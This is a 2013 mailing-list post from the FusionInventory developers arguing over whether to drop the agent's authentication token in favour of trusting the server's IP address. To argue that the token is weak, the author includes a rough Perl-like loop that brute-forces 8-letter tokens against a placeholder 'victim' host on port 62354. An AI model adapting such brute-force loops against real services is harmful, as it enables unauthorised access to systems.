[Fusioninventory-devel] Dropping the authentication token
Guillaume Rousse
guillomovitch at gmail.com
Mon Mar 4 11:46:00 UTC 2013
Le 04/03/2013 10:46, David DURIEUX a écrit :
> Le Mon, 04 Mar 2013 10:43:44 +0100
> Guillaume Rousse <guillomovitch at gmail.com> a écrit:
>
>> Le 04/03/2013 08:40, David DURIEUX a écrit :
>>> For security reasons, habe token is more safe, and I prefer have a
>>> token than allow the ip of the server.
>> Prove it.
>
> It's more difficult to have the right token (regenerated at each
> execution of agent) than have a computer with the IP of the trusted
> server
Welcome to the real world.
my @alphabet = 'A' .. 'Z';
foreach my $a (@alphabet) {
foreach my $b (@alphabet) {
foreach my $c (@alphabet) {
foreach my $d (@alphabet) {
foreach my $e (@alphabet) {
foreach my $f (@alphabet) {
foreach my $g (@alphabet) {
foreach my $h (@alphabet) {
GET "http://victim:62354/now?token="$a$b$c$d$e$f$g$h"
&& print "look ma, I brute-forced the token";
}
}
}
}
}
}
}
}
On the other hand, the capacity of spoofing an IP adress is highly
dependant of local network configuration.
My point is just than both solutions are differently insecure, with the
token solution more cumbersome to implement. Given than there is
actually very few things an attacker would gain by defeating this
protection anyway, let's keep it simple and stupid.
--
BOFH excuse #338:
old inkjet cartridges emanate barium-based fumes
More information about the Fusioninventory-devel
mailing list